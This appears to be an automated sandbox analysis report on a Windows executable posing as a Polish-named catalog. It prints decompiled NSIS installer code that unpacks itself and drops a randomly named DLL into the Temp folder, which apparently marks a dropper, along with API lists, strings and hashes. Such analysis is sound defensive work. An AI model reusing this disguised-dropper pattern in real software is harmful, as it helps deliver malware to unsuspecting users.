                                                  						E00405AAE(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407342, 0x42a0a0, 0);
                                                  					}
                                                  					lstrcatA("1033", _t79);
                                                  				} else {
                                                  					E00405B25("1033",  *_t20() & 0x0000ffff);
                                                  				}
                                                  				E004038E3(_t76, _t88);
                                                  				_t24 =  *0x42ec38; // 0x80
                                                  				_t84 = "C:\\Users\\engineer\\AppData\\Local\\Temp";
                                                  				 *0x42eca0 = _t24 & 0x00000020;
                                                  				 *0x42ecbc = 0x10000;
                                                  				if(E0040579B(_t88, "C:\\Users\\engineer\\AppData\\Local\\Temp") != 0) {
                                                  					L16:
                                                  					if(E0040579B(_t96, _t84) == 0) {
                                                  						E00405BE9(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
                                                  					}
                                                  					_t28 = LoadImageA( *0x42ec20, 0x67, 1, 0, 0, 0x8040); // executed
                                                  					 *0x42e408 = _t28;
                                                  					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
                                                  						L21:
                                                  						if(E0040140B(0) == 0) {
                                                  							_t30 = E004038E3(_t76, __eflags);
                                                  							__eflags =  *0x42ecc0; // 0x0
                                                  							if(__eflags != 0) {
                                                  								_t31 = E00404F85(_t30, 0);
                                                  								__eflags = _t31;
                                                  								if(_t31 == 0) {
                                                  									E0040140B(1);
                                                  									goto L33;
                                                  								}
                                                  								__eflags =  *0x42e3ec; // 0x0
                                                  								if(__eflags == 0) {
                                                  									E0040140B(2);
                                                  								}
                                                  								goto L22;
                                                  							}
                                                  							ShowWindow( *0x42a078, 5); // executed
                                                  							_t37 = E00405EE9("RichEd20"); // executed
                                                  							__eflags = _t37;
                                                  							if(_t37 == 0) {
                                                  								E00405EE9("RichEd32");
                                                  							}
                                                  							_t85 = "RichEdit20A";
                                                  							_t38 = GetClassInfoA(0, _t85, 0x42e3c0);
                                                  							__eflags = _t38;
                                                  							if(_t38 == 0) {
                                                  								GetClassInfoA(0, "RichEdit", 0x42e3c0);
                                                  								 *0x42e3e4 = _t85;
                                                  								RegisterClassA(0x42e3c0);
                                                  							}
                                                  							_t39 =  *0x42e400; // 0x0
                                                  							_t42 = DialogBoxParamA( *0x42ec20, _t39 + 0x00000069 & 0x0000ffff, 0, E004039B0, 0); // executed
                                                  							E0040356A(E0040140B(5), 1);
                                                  							return _t42;
                                                  						}
                                                  						L22:
                                                  						_t34 = 2;
                                                  						return _t34;
                                                  					} else {
                                                  						_t76 =  *0x42ec20; // 0x400000
                                                  						 *0x42e3d4 = _t28;
                                                  						_v20 = 0x624e5f;
                                                  						 *0x42e3c4 = E00401000;
                                                  						 *0x42e3d0 = _t76;
                                                  						 *0x42e3e4 =  &_v20;
                                                  						if(RegisterClassA(0x42e3c0) == 0) {
                                                  							L33:
                                                  							__eflags = 0;
                                                  							return 0;
                                                  						}
                                                  						_t12 =  &_v16; // 0x624e5f
                                                  						SystemParametersInfoA(0x30, 0, _t12, 0);
                                                  						 *0x42a078 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42ec20, 0);
                                                  						goto L21;
                                                  					}
                                                  				} else {
                                                  					_t76 =  *(_t81 + 0x48);
                                                  					if(_t76 == 0) {
                                                  						goto L16;
                                                  					}
                                                  					_t60 =  *0x42ec58; // 0x7a2864
                                                  					_t79 = 0x42dbc0;
                                                  					E00405AAE( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) + _t60, 0x42dbc0, 0);
                                                  					_t62 =  *0x42dbc0; // 0x72
                                                  					if(_t62 == 0) {
                                                  						goto L16;
                                                  					}
                                                  					if(_t62 == 0x22) {
                                                  						_t79 = 0x42dbc1;
                                                  						 *((char*)(E004056E5(0x42dbc1, 0x22))) = 0;
                                                  					}
                                                  					_t64 = lstrlenA(_t79) + _t79 - 4;
                                                  					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
                                                  						L15:
                                                  						E00405BC7(_t84, E004056BA(_t79));
                                                  						goto L16;
                                                  					} else {
                                                  						_t68 = GetFileAttributesA(_t79);
                                                  						if(_t68 == 0xffffffff) {
                                                  							L14:
                                                  							E00405701(_t79);
                                                  							goto L15;
                                                  						}
                                                  						_t96 = _t68 & 0x00000010;
                                                  						if((_t68 & 0x00000010) != 0) {
                                                  							goto L15;
                                                  						}
                                                  						goto L14;
                                                  					}
                                                  				}
                                                  			}






























                                                  APIs
                                                    • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                    • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                  • lstrcatA.KERNEL32(1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" ,00000000), ref: 0040368B
                                                  • lstrlenA.KERNEL32(rtrystwqtc,?,?,?,rtrystwqtc,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 00403700
                                                  • lstrcmpiA.KERNEL32(?,.exe,rtrystwqtc,?,?,?,rtrystwqtc,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000), ref: 00403713
                                                  • GetFileAttributesA.KERNEL32(rtrystwqtc), ref: 0040371E
                                                  • LoadImageA.USER32 ref: 00403767
                                                    • Part of subcall function 00405B25: wsprintfA.USER32 ref: 00405B32
                                                  • RegisterClassA.USER32 ref: 004037AE
                                                  • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004037C6
                                                  • CreateWindowExA.USER32 ref: 004037FF
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403835
                                                  • GetClassInfoA.USER32 ref: 00403861
                                                  • GetClassInfoA.USER32 ref: 0040386E
                                                  • RegisterClassA.USER32 ref: 00403877
                                                  • DialogBoxParamA.USER32 ref: 00403896
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Xy$_Nb$d(z$rtrystwqtc
                                                  • API String ID: 1975747703-990386603
                                                  • Opcode ID: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
                                                  • Instruction ID: 439cf4cca7a437fbaee012d0436cdd450a481f2d9ea16570e6e497c3a9acd7f8
                                                  • Opcode Fuzzy Hash: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
                                                  • Instruction Fuzzy Hash: 4861C6B16042007EE220BF629C45E273AACEB44759F44447FF941B62E2DB7DA9418A3E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 80%
                                                  			E00402C55(void* __eflags, signed int _a4) {
                                                  				DWORD* _v8;
                                                  				DWORD* _v12;
                                                  				void* _v16;
                                                  				intOrPtr _v20;
                                                  				long _v24;
                                                  				intOrPtr _v28;
                                                  				intOrPtr _v32;
                                                  				intOrPtr _v36;
                                                  				intOrPtr _v40;
                                                  				signed int _v44;
                                                  				long _t43;
                                                  				signed int _t50;
                                                  				void* _t53;
                                                  				signed int _t54;
                                                  				void* _t57;
                                                  				intOrPtr* _t59;
                                                  				long _t60;
                                                  				signed int _t65;
                                                  				signed int _t67;
                                                  				signed int _t70;
                                                  				signed int _t71;
                                                  				signed int _t77;
                                                  				intOrPtr _t80;
                                                  				long _t82;
                                                  				signed int _t85;
                                                  				signed int _t87;
                                                  				void* _t89;
                                                  				signed int _t90;
                                                  				signed int _t93;
                                                  				void* _t94;
                                                  
                                                  				_t82 = 0;
                                                  				_v12 = 0;
                                                  				_v8 = 0;
                                                  				_t43 = GetTickCount();
                                                  				_t91 = "C:\\Users\\engineer\\Desktop\\nowy przyk#U0142adowy katalog.exe";
                                                  				 *0x42ec2c = _t43 + 0x3e8;
                                                  				GetModuleFileNameA(0, "C:\\Users\\engineer\\Desktop\\nowy przyk#U0142adowy katalog.exe", 0x400);
                                                  				_t89 = E0040589E(_t91, 0x80000000, 3);
                                                  				_v16 = _t89;
                                                  				 *0x409014 = _t89;
                                                  				if(_t89 == 0xffffffff) {
                                                  					return "Error launching installer";
                                                  				}
                                                  				_t92 = "C:\\Users\\engineer\\Desktop";
                                                  				E00405BC7("C:\\Users\\engineer\\Desktop", _t91);
                                                  				E00405BC7(0x436000, E00405701(_t92));
                                                  				_t50 = GetFileSize(_t89, 0);
                                                  				__eflags = _t50;
                                                  				 *0x428c50 = _t50;
                                                  				_t93 = _t50;
                                                  				if(_t50 <= 0) {
                                                  					L24:
                                                  					E00402BF1(1);
                                                  					__eflags =  *0x42ec34 - _t82; // 0x27c00
                                                  					if(__eflags == 0) {
                                                  						goto L29;
                                                  					}
                                                  					__eflags = _v8 - _t82;
                                                  					if(_v8 == _t82) {
                                                  						L28:
                                                  						_t53 = GlobalAlloc(0x40, _v24); // executed
                                                  						_t94 = _t53;
                                                  						_t54 =  *0x42ec34; // 0x27c00
                                                  						E004030E2(_t54 + 0x1c);
                                                  						_push(_v24);
                                                  						_push(_t94);
                                                  						_push(_t82);
                                                  						_push(0xffffffff);
                                                  						_t57 = E00402E8E();
                                                  						__eflags = _t57 - _v24;
                                                  						if(_t57 == _v24) {
                                                  							__eflags = _v44 & 0x00000001;
                                                  							 *0x42ec30 = _t94;
                                                  							 *0x42ec38 =  *_t94;
                                                  							if((_v44 & 0x00000001) != 0) {
                                                  								 *0x42ec3c =  *0x42ec3c + 1;
                                                  								__eflags =  *0x42ec3c;
                                                  							}
                                                  							_t40 = _t94 + 0x44; // 0x44
                                                  							_t59 = _t40;
                                                  							_t85 = 8;
                                                  							do {
                                                  								_t59 = _t59 - 8;
                                                  								 *_t59 =  *_t59 + _t94;
                                                  								_t85 = _t85 - 1;
                                                  								__eflags = _t85;
                                                  							} while (_t85 != 0);
                                                  							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                  							 *(_t94 + 0x3c) = _t60;
                                                  							E0040585F(0x42ec40, _t94 + 4, 0x40);
                                                  							__eflags = 0;
                                                  							return 0;
                                                  						}
                                                  						goto L29;
                                                  					}
                                                  					E004030E2( *0x414c40);
                                                  					_t65 = E004030B0( &_a4, 4); // executed
                                                  					__eflags = _t65;
                                                  					if(_t65 == 0) {
                                                  						goto L29;
                                                  					}
                                                  					__eflags = _v12 - _a4;
                                                  					if(_v12 != _a4) {
                                                  						goto L29;
                                                  					}
                                                  					goto L28;
                                                  				} else {
                                                  					do {
                                                  						_t67 =  *0x42ec34; // 0x27c00
                                                  						_t90 = _t93;
                                                  						asm("sbb eax, eax");
                                                  						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
                                                  						__eflags = _t93 - _t70;
                                                  						if(_t93 >= _t70) {
                                                  							_t90 = _t70;
                                                  						}
                                                  						_t71 = E004030B0(0x420c50, _t90); // executed
                                                  						__eflags = _t71;
                                                  						if(_t71 == 0) {
                                                  							E00402BF1(1);
                                                  							L29:
                                                  							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                  						}
                                                  						__eflags =  *0x42ec34;
                                                  						if( *0x42ec34 != 0) {
                                                  							__eflags = _a4 & 0x00000002;
                                                  							if((_a4 & 0x00000002) == 0) {
                                                  								E00402BF1(0);
                                                  							}
                                                  							goto L20;
                                                  						}
                                                  						E0040585F( &_v44, 0x420c50, 0x1c);
                                                  						_t77 = _v44;
                                                  						__eflags = _t77 & 0xfffffff0;
                                                  						if((_t77 & 0xfffffff0) != 0) {
                                                  							goto L20;
                                                  						}
                                                  						__eflags = _v40 - 0xdeadbeef;
                                                  						if(_v40 != 0xdeadbeef) {
                                                  							goto L20;
                                                  						}
                                                  						__eflags = _v28 - 0x74736e49;
                                                  						if(_v28 != 0x74736e49) {
                                                  							goto L20;
                                                  						}
                                                  						__eflags = _v32 - 0x74666f73;
                                                  						if(_v32 != 0x74666f73) {
                                                  							goto L20;
                                                  						}
                                                  						__eflags = _v36 - 0x6c6c754e;
                                                  						if(_v36 != 0x6c6c754e) {
                                                  							goto L20;
                                                  						}
                                                  						_a4 = _a4 | _t77;
                                                  						_t87 =  *0x414c40; // 0x67196
                                                  						 *0x42ecc0 =  *0x42ecc0 | _a4 & 0x00000002;
                                                  						_t80 = _v20;
                                                  						__eflags = _t80 - _t93;
                                                  						 *0x42ec34 = _t87;
                                                  						if(_t80 > _t93) {
                                                  							goto L29;
                                                  						}
                                                  						__eflags = _a4 & 0x00000008;
                                                  						if((_a4 & 0x00000008) != 0) {
                                                  							L16:
                                                  							_v8 = _v8 + 1;
                                                  							_t93 = _t80 - 4;
                                                  							__eflags = _t90 - _t93;
                                                  							if(_t90 > _t93) {
                                                  								_t90 = _t93;
                                                  							}
                                                  							goto L20;
                                                  						}
                                                  						__eflags = _a4 & 0x00000004;
                                                  						if((_a4 & 0x00000004) != 0) {
                                                  							break;
                                                  						}
                                                  						goto L16;
                                                  						L20:
                                                  						__eflags = _t93 -  *0x428c50; // 0x6719a
                                                  						if(__eflags < 0) {
                                                  							_v12 = E00405FC6(_v12, 0x420c50, _t90);
                                                  						}
                                                  						 *0x414c40 =  *0x414c40 + _t90;
                                                  						_t93 = _t93 - _t90;
                                                  						__eflags = _t93;
                                                  					} while (_t93 > 0);
                                                  					_t82 = 0;
                                                  					__eflags = 0;
                                                  					goto L24;
                                                  				}
                                                  			}

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402C66
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe,00000400), ref: 00402C82
                                                    • Part of subcall function 0040589E: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe,80000000,00000003), ref: 004058A2
                                                    • Part of subcall function 0040589E: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
                                                  • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe,C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe,80000000,00000003), ref: 00402CCE
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5F
                                                  • C:\Users\user\Desktop, xrefs: 00402CB0, 00402CB5, 00402CBB
                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E2D
                                                  • Inst, xrefs: 00402D3A
                                                  • Xy, xrefs: 00402E42
                                                  • Null, xrefs: 00402D4C
                                                  • Error launching installer, xrefs: 00402CA5
                                                  • C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe, xrefs: 00402C6C, 00402C7B, 00402C8F, 00402CAF
                                                  • "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" , xrefs: 00402C55
                                                  • soft, xrefs: 00402D43
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                  • String ID: "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$Xy$soft
                                                  • API String ID: 4283519449-2338875126
                                                  • Opcode ID: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
                                                  • Instruction ID: 196f3fd9364ed88bbd27218647615838fe3130e8ea263fbe41a0cbd6df82c613
                                                  • Opcode Fuzzy Hash: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
                                                  • Instruction Fuzzy Hash: 6A510871941218ABDB609F66DE89B9E7BB8EF00314F10403BF904B62D1CBBC9D418B9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 95%
                                                  			E00402E8E(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
                                                  				signed int _v8;
                                                  				long _v12;
                                                  				void* _v16;
                                                  				long _v20;
                                                  				long _v24;
                                                  				intOrPtr _v28;
                                                  				char _v92;
                                                  				void* _t67;
                                                  				void* _t68;
                                                  				long _t74;
                                                  				intOrPtr _t79;
                                                  				long _t80;
                                                  				void* _t82;
                                                  				int _t84;
                                                  				intOrPtr _t95;
                                                  				void* _t97;
                                                  				void* _t100;
                                                  				long _t101;
                                                  				signed int _t102;
                                                  				long _t103;
                                                  				int _t104;
                                                  				intOrPtr _t105;
                                                  				long _t106;
                                                  				void* _t107;
                                                  
                                                  				_t102 = _a16;
                                                  				_t97 = _a12;
                                                  				_v12 = _t102;
                                                  				if(_t97 == 0) {
                                                  					_v12 = 0x8000;
                                                  				}
                                                  				_v8 = _v8 & 0x00000000;
                                                  				_v16 = _t97;
                                                  				if(_t97 == 0) {
                                                  					_v16 = 0x418c48;
                                                  				}
                                                  				_t65 = _a4;
                                                  				if(_a4 >= 0) {
                                                  					_t95 =  *0x42ec78; // 0x29045
                                                  					E004030E2(_t95 + _t65);
                                                  				}
                                                  				_t67 = E004030B0( &_a16, 4); // executed
                                                  				if(_t67 == 0) {
                                                  					L34:
                                                  					_push(0xfffffffd);
                                                  					goto L35;
                                                  				} else {
                                                  					if((_a19 & 0x00000080) == 0) {
                                                  						if(_t97 == 0) {
                                                  							while(_a16 > 0) {
                                                  								_t103 = _v12;
                                                  								if(_a16 < _t103) {
                                                  									_t103 = _a16;
                                                  								}
                                                  								if(E004030B0(0x414c48, _t103) == 0) {
                                                  									goto L34;
                                                  								} else {
                                                  									if(WriteFile(_a8, 0x414c48, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
                                                  										L29:
                                                  										_push(0xfffffffe);
                                                  										L35:
                                                  										_pop(_t68);
                                                  										return _t68;
                                                  									} else {
                                                  										_v8 = _v8 + _t103;
                                                  										_a16 = _a16 - _t103;
                                                  										continue;
                                                  									}
                                                  								}
                                                  							}
                                                  							L45:
                                                  							return _v8;
                                                  						}
                                                  						if(_a16 < _t102) {
                                                  							_t102 = _a16;
                                                  						}
                                                  						if(E004030B0(_t97, _t102) != 0) {
                                                  							_v8 = _t102;
                                                  							goto L45;
                                                  						} else {
                                                  							goto L34;
                                                  						}
                                                  					}
                                                  					_t74 = GetTickCount();
                                                  					 *0x40b5ac =  *0x40b5ac & 0x00000000;
                                                  					 *0x40b5a8 =  *0x40b5a8 & 0x00000000;
                                                  					_t14 =  &_a16;
                                                  					 *_t14 = _a16 & 0x7fffffff;
                                                  					_v20 = _t74;
                                                  					 *0x40b090 = 8;
                                                  					 *0x414c38 = 0x40cc30;
                                                  					 *0x414c34 = 0x40cc30;
                                                  					 *0x414c30 = 0x414c30;
                                                  					_a4 = _a16;
                                                  					if( *_t14 <= 0) {
                                                  						goto L45;
                                                  					} else {
                                                  						goto L9;
                                                  					}
                                                  					while(1) {
                                                  						L9:
                                                  						_t104 = 0x4000;
                                                  						if(_a16 < 0x4000) {
                                                  							_t104 = _a16;
                                                  						}
                                                  						if(E004030B0(0x414c48, _t104) == 0) {
                                                  							goto L34;
                                                  						}
                                                  						_a16 = _a16 - _t104;
                                                  						 *0x40b080 = 0x414c48;
                                                  						 *0x40b084 = _t104;
                                                  						while(1) {
                                                  							_t100 = _v16;
                                                  							 *0x40b088 = _t100;
                                                  							 *0x40b08c = _v12;
                                                  							_t79 = E00406034(0x40b080);
                                                  							_v28 = _t79;
                                                  							if(_t79 < 0) {
                                                  								break;
                                                  							}
                                                  							_t105 =  *0x40b088; // 0x41f64c
                                                  							_t106 = _t105 - _t100;
                                                  							_t80 = GetTickCount();
                                                  							_t101 = _t80;
                                                  							if(( *0x42ecd4 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
                                                  								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                  								_t107 = _t107 + 0xc;
                                                  								E00404EB3(0,  &_v92);
                                                  								_v20 = _t101;
                                                  							}
                                                  							if(_t106 == 0) {
                                                  								if(_a16 > 0) {
                                                  									goto L9;
                                                  								}
                                                  								goto L45;
                                                  							} else {
                                                  								if(_a12 != 0) {
                                                  									_t82 =  *0x40b088; // 0x41f64c
                                                  									_v8 = _v8 + _t106;
                                                  									_v12 = _v12 - _t106;
                                                  									_v16 = _t82;
                                                  									L24:
                                                  									if(_v28 != 1) {
                                                  										continue;
                                                  									}
                                                  									goto L45;
                                                  								}
                                                  								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
                                                  								if(_t84 == 0 || _v24 != _t106) {
                                                  									goto L29;
                                                  								} else {
                                                  									_v8 = _v8 + _t106;
                                                  									goto L24;
                                                  								}
                                                  							}
                                                  						}
                                                  						_push(0xfffffffc);
                                                  						goto L35;
                                                  					}
                                                  					goto L34;
                                                  				}
                                                  			}



























                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402EF5
                                                  • GetTickCount.KERNEL32 ref: 00402F9C
                                                  • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402FC5
                                                  • wsprintfA.USER32 ref: 00402FD5
                                                  • WriteFile.KERNELBASE(00000000,00000000,0041F64C,7FFFFFFF,00000000), ref: 00403003
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: CountTick$FileWritewsprintf
                                                  • String ID: ... %d%%$HLA$HLA$ber
                                                  • API String ID: 4209647438-2043853910
                                                  • Opcode ID: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
                                                  • Instruction ID: 15109c7e5c0d48913ae26536c30eb2ff4c12f072ab55fd5dd83b367320b2a29b
                                                  • Opcode Fuzzy Hash: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
                                                  • Instruction Fuzzy Hash: 2C618E71902219DBDB10DF65EA44AAF7BB8EB04356F10417BF910B72C4D7789A40CBE9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 73%
                                                  			E00401751(FILETIME* __ebx, void* __eflags) {
                                                  				void* _t33;
                                                  				void* _t41;
                                                  				void* _t43;
                                                  				FILETIME* _t49;
                                                  				FILETIME* _t62;
                                                  				void* _t64;
                                                  				signed int _t70;
                                                  				FILETIME* _t71;
                                                  				FILETIME* _t75;
                                                  				signed int _t77;
                                                  				void* _t80;
                                                  				CHAR* _t82;
                                                  				void* _t85;
                                                  
                                                  				_t75 = __ebx;
                                                  				_t82 = E00402A29(0x31);
                                                  				 *(_t85 - 0xc) = _t82;
                                                  				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                                                  				_t33 = E00405727(_t82);
                                                  				_push(_t82);
                                                  				if(_t33 == 0) {
                                                  					lstrcatA(E004056BA(E00405BC7(0x409c40, "C:\\Users\\engineer\\AppData\\Local\\Temp")), ??);
                                                  				} else {
                                                  					_push(0x409c40);
                                                  					E00405BC7();
                                                  				}
                                                  				E00405E29(0x409c40);
                                                  				while(1) {
                                                  					__eflags =  *(_t85 + 8) - 3;
                                                  					if( *(_t85 + 8) >= 3) {
                                                  						_t64 = E00405EC2(0x409c40);
                                                  						_t77 = 0;
                                                  						__eflags = _t64 - _t75;
                                                  						if(_t64 != _t75) {
                                                  							_t71 = _t64 + 0x14;
                                                  							__eflags = _t71;
                                                  							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                                                  						}
                                                  						asm("sbb eax, eax");
                                                  						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                  						__eflags = _t70;
                                                  						 *(_t85 + 8) = _t70;
                                                  					}
                                                  					__eflags =  *(_t85 + 8) - _t75;
                                                  					if( *(_t85 + 8) == _t75) {
                                                  						E0040587F(0x409c40);
                                                  					}
                                                  					__eflags =  *(_t85 + 8) - 1;
                                                  					_t41 = E0040589E(0x409c40, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                  					__eflags = _t41 - 0xffffffff;
                                                  					 *(_t85 - 8) = _t41;
                                                  					if(_t41 != 0xffffffff) {
                                                  						break;
                                                  					}
                                                  					__eflags =  *(_t85 + 8) - _t75;
                                                  					if( *(_t85 + 8) != _t75) {
                                                  						E00404EB3(0xffffffe2,  *(_t85 - 0xc));
                                                  						__eflags =  *(_t85 + 8) - 2;
                                                  						if(__eflags == 0) {
                                                  							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                  						}
                                                  						L31:
                                                  						 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t85 - 4));
                                                  						__eflags =  *0x42eca8;
                                                  						goto L32;
                                                  					} else {
                                                  						E00405BC7(0x40a440, 0x42f000);
                                                  						E00405BC7(0x42f000, 0x409c40);
                                                  						E00405BE9(_t75, 0x40a440, 0x409c40, "C:\Users\engineer\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dll",  *((intOrPtr*)(_t85 - 0x14)));
                                                  						E00405BC7(0x42f000, 0x40a440);
                                                  						_t62 = E00405488("C:\Users\engineer\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dll",  *(_t85 - 0x28) >> 3) - 4;
                                                  						__eflags = _t62;
                                                  						if(_t62 == 0) {
                                                  							continue;
                                                  						} else {
                                                  							__eflags = _t62 == 1;
                                                  							if(_t62 == 1) {
                                                  								 *0x42eca8 =  &( *0x42eca8->dwLowDateTime);
                                                  								L32:
                                                  								_t49 = 0;
                                                  								__eflags = 0;
                                                  							} else {
                                                  								_push(0x409c40);
                                                  								_push(0xfffffffa);
                                                  								E00404EB3();
                                                  								L29:
                                                  								_t49 = 0x7fffffff;
                                                  							}
                                                  						}
                                                  					}
                                                  					L33:
                                                  					return _t49;
                                                  				}
                                                  				E00404EB3(0xffffffea,  *(_t85 - 0xc));
                                                  				 *0x42ecd4 =  *0x42ecd4 + 1;
                                                  				_t43 = E00402E8E( *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 8), _t75, _t75); // executed
                                                  				 *0x42ecd4 =  *0x42ecd4 - 1;
                                                  				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                                                  				_t80 = _t43;
                                                  				if( *(_t85 - 0x1c) != 0xffffffff) {
                                                  					L22:
                                                  					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
                                                  				} else {
                                                  					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
                                                  					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
                                                  						goto L22;
                                                  					}
                                                  				}
                                                  				FindCloseChangeNotification( *(_t85 - 8)); // executed
                                                  				__eflags = _t80 - _t75;
                                                  				if(_t80 >= _t75) {
                                                  					goto L31;
                                                  				} else {
                                                  					__eflags = _t80 - 0xfffffffe;
                                                  					if(_t80 != 0xfffffffe) {
                                                  						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffee);
                                                  					} else {
